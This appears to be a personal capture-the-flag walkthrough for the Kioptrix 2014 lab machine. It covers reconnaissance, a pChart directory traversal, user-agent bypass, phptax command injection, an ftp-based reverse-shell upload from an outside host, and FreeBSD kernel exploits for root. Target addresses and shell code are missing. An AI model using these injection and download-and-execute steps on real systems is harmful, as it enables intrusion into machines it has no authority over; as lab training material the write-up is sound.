Kioptrix2014 (#5)


  • netdiscover
  • Nmap
  • Nikto
  • User Agent Switcher


Use netdiscover to detect target IP address

netdiscover -i eth0 -r is the target.

Then run nmap to detect opening ports and running services on the target machine.

nmap -sV -v -O -A -T5 -p-

port 80 and 8080 are opening

use nikto to scan

nikto -h

nothing cool.

Use firefox to check the page port 80

just simple It works

port 8080

got forbidden. Great :(

now go back to port 80 and check the source code

find pchart2.1.3. pchart. I googled pchart2.1.3, find exploits pChart 2.1.3 - Multiple Vulnerabilities. I will use directory traversal.

got passwd file, this is good, but not godd enough because I cannot shadow file.

Since Nmap determinate the target OS is FreeBSD, the Apache configure file is /usr/local/etc/apache2x/httpd.conf`. Apache HTTP Server

Here I find:

The port 8080 only allow Mozilla/4.0 user-agent. I use User Agent Switcher (firefox plugin) to change my user-agent to Mozilla/4.0, then visit

now search phptax

searchsploit phptax

test upload php shell first:; uname > test.txt&pdf=make

Here I tired to wget the php shell from my http server didn’t work. I also tried to write php shell to a php file driectly, also failed. Now I use ftp to upload my shell:

check if ftp is availabe:;which ftp >test1.txt; &pdf=make

php reverse shell:


change the IP address:

upload the shell using ftp:;ftp -4 -d -v ftp://bobftpusername:bobftppassword@; &pdf=make

set up nc listener

get the shell:

check the kernel version

Its FreeBSD 9.0-RELEASE, searchsploit freebsd 9.0

copy these two exploits to /ftphome/

download them to the target:

ftp -4 -d -v ftp://bobftpusername:bobftppassward@ ftp -4 -d -v ftp://bobftpusername:bobftppassward@

get the F***ing root: